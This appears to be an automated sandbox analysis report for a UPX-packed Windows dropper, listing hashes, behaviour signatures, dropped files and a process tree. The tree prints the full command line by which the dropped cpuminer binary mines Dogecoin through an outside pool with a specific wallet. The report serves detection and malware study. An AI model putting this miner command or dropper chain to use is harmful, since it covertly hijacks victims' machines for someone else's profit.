73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
300s
max time network
314s
platform
windows10-2004_x64
resource
win10v2004-20240221-ja
resource tags

arch:x64arch:x86image:win10v2004-20240221-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
24-02-2024 11:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3844919115-497234255-166257750-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3844919115-497234255-166257750-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
2856	b2e.exe
1232	cpuminer-sse2.exe

Loads dropped DLL 6 IoCs

pid	Process
1232	cpuminer-sse2.exe
1232	cpuminer-sse2.exe
1232	cpuminer-sse2.exe
1232	cpuminer-sse2.exe
1232	cpuminer-sse2.exe
1232	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/4852-1-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 4852 wrote to memory of 2856	4852	batexe.exe	92
PID 4852 wrote to memory of 2856	4852	batexe.exe	92
PID 4852 wrote to memory of 2856	4852	batexe.exe	92
PID 2856 wrote to memory of 1836	2856	b2e.exe	93
PID 2856 wrote to memory of 1836	2856	b2e.exe	93
PID 2856 wrote to memory of 1836	2856	b2e.exe	93
PID 1836 wrote to memory of 1232	1836	cmd.exe	96
PID 1836 wrote to memory of 1232	1836	cmd.exe	96

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4852
- C:\Users\Admin\AppData\Local\Temp\6C61.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\6C61.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\6C61.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2856
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\870D.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1836
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1232

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\6C61.tmp\b2e.exe

Filesize
398KB

MD5
29d9deaeda7587341a2cc1e840b16c8b

SHA1
11941278347990635a1e9fd75b0577af5c7caaa6

SHA256
0d65d7570323de8892fadd1cb9a6e95f4d516f812b75091b140c21e0a347232e

SHA512
4abd0b3786661e8b6dec73ef3bc5059de2a8af478f0ce1381f2df8d683668dcbcab5f828cab4c0f01a75dc1dd8ec6080fa93836a19298bc709b769e4fe676691

Download Submit
C:\Users\Admin\AppData\Local\Temp\6C61.tmp\b2e.exe

Filesize
1.2MB

MD5
8ca7a8bb8cf37a60cddffcb762e0018c

SHA1
e25ff5db3454bc5c87b6cbc86e501d8f25acd936

SHA256
4cc56decdc93f33f32d7af1af20fe07d6565ad291662ba6349409c1ea0f9a179

SHA512
7fe6dd4f4685897f0a995f35fb2ae9c723781b029ef83e2599105c292518b91ef36f858803b2adf5ca19278daf6d380bc846a853015f242ed107ebfd84b342ae

Download Submit
C:\Users\Admin\AppData\Local\Temp\6C61.tmp\b2e.exe

Filesize
1.1MB

MD5
52e09a113dfb0492676673458a239073

SHA1
32377d738159f159162f8295e6d56cca86794008

SHA256
3c7ad752e84b6830d91bb43822a94e1f57ecb51e0e313f9b3beb0ce844dffaf8

SHA512
1551cb7ec4ccbd94bdb5dfc20e8cd54046052835d1ffb0f572786f3fb4631a53bce2d7f731fcc56c7ae0cfc9884630854a1fed2c010f301aa7b4376402dff891

Download Submit
C:\Users\Admin\AppData\Local\Temp\870D.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
1.7MB

MD5
e79201e442b7f8fc7fc542d1214ea430

SHA1
e85984dd0262d4650062ef5ae1e4173cf2d4fad4

SHA256
80d41cc0d94bf00de0099e55b2b1c333ed2e79d984e76f1e3ec2d12e49ef5886

SHA512
219e249d8c1ba095105d75e680a8cacba827fb8b98b6db0dd69c9062cf7468547c07bce865c6da67dff93143add9afa77c6d8e82065ee8edb4a725a3b9da98ea

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
1.6MB

MD5
3cb5e9c2142ba013a86bb803d8a7c219

SHA1
db07e2686a773922fd59e0e39840f0db98710f12

SHA256
b0c09b239f5e6a291aa5afddac7915a7d12707f616a616fa892d26b489c31f34

SHA512
ce1836089f0fa6b7f87931d1a4d97e1c0d7b75e6ae02252ec8ce67b8ed3126ecf436a6a426a32481e385d79ade39c0f616110e50faebf3f00b7b6fc6a4a87f94

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
836KB

MD5
aeab40ed9a8e627ea7cefc1f5cf9bf7a

SHA1
5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

SHA256
218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

SHA512
c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
1.2MB

MD5
7cf672bee2afba2dcd0c031ff985958e

SHA1
6b82a205db080ffdcb4a4470fce85a14413f3217

SHA256
c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05

SHA512
3e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
951KB

MD5
c650af9bcd4a8a4375229edadae1a217

SHA1
0b5beaeadd1a0125ac12e58bda4d6dc02dda25c1

SHA256
fd0677df8e4cbec37a80dc4ff774d8f5a39bd9e7ed2ac17dd7b675802276469b

SHA512
af175bbb63d7794ab730421eb98be1c34535393fa92632bafda028023ff7fa97672ddfe666f28b9e2c8a72771aa0d1fe119863ef95afd0b7d2bc708f59ac494f

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
972KB

MD5
0c657b9d6955d00ae29be1e8eb84d401

SHA1
143f077a9bd42513c328a0c8dbadc5f4de0d6fa6

SHA256
6d4f49e2bb35fe8d2cb5cc953707cdaae987b4eb15251fbe97c806952d00d66c

SHA512
0d8bfc1a189bc6828793d13a71e599302e6ed762b070ae3ac419c1829238201474f629c8ac7a8ebc8649265b9a99ddb1c4031c3b9d38d1129f238d3a2dc4d7e2

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
1.9MB

MD5
6f834fb0f20f5bbc53304b61c1eed9f1

SHA1
f1db591a02a15c11682ec4952defe9cb08a3f44f

SHA256
c5c14f7e1c24512c6501768ff0ff47e7fc17a5876171495560b29b07a6670c3d

SHA512
a6e1da9ff6b5095b16c69158764d350e6e83933167cc655c765489afdefddc211f1cd81a34c3375ceaf59235b0e3001367d9c1461ae3f3bc079c4b08ebd344a2

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
1.5MB

MD5
267f4c2966123675997e928ea35cd998

SHA1
4322754c7767b041853ecf5ccbe3e4a278d41a74

SHA256
374b5d7e0c7bd965a755a0fe6b62bdf4847362b1df5a982f366b48834c5971c4

SHA512
dbff17c255ace1974d1b1cbb65083022db2b219cffb5cbb7203c8650c5ff1b15db826a0d39a012e9f6aad6ca8b5cd27a3078ba21c264f63dec1fd1fb3250206c

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
memory/1232-67-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1232-82-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1232-43-0x0000000001020000-0x00000000010DC000-memory.dmp

Filesize
752KB

Download
memory/1232-46-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1232-47-0x000000006FC40000-0x00000000714F5000-memory.dmp

Filesize
24.7MB

Download
memory/1232-48-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/1232-50-0x000000005EFE0000-0x000000005F078000-memory.dmp

Filesize
608KB

Download
memory/1232-49-0x0000000001020000-0x00000000010DC000-memory.dmp

Filesize
752KB

Download
memory/1232-51-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1232-107-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1232-57-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1232-102-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1232-77-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1232-97-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1232-92-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2856-8-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/2856-56-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4852-1-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download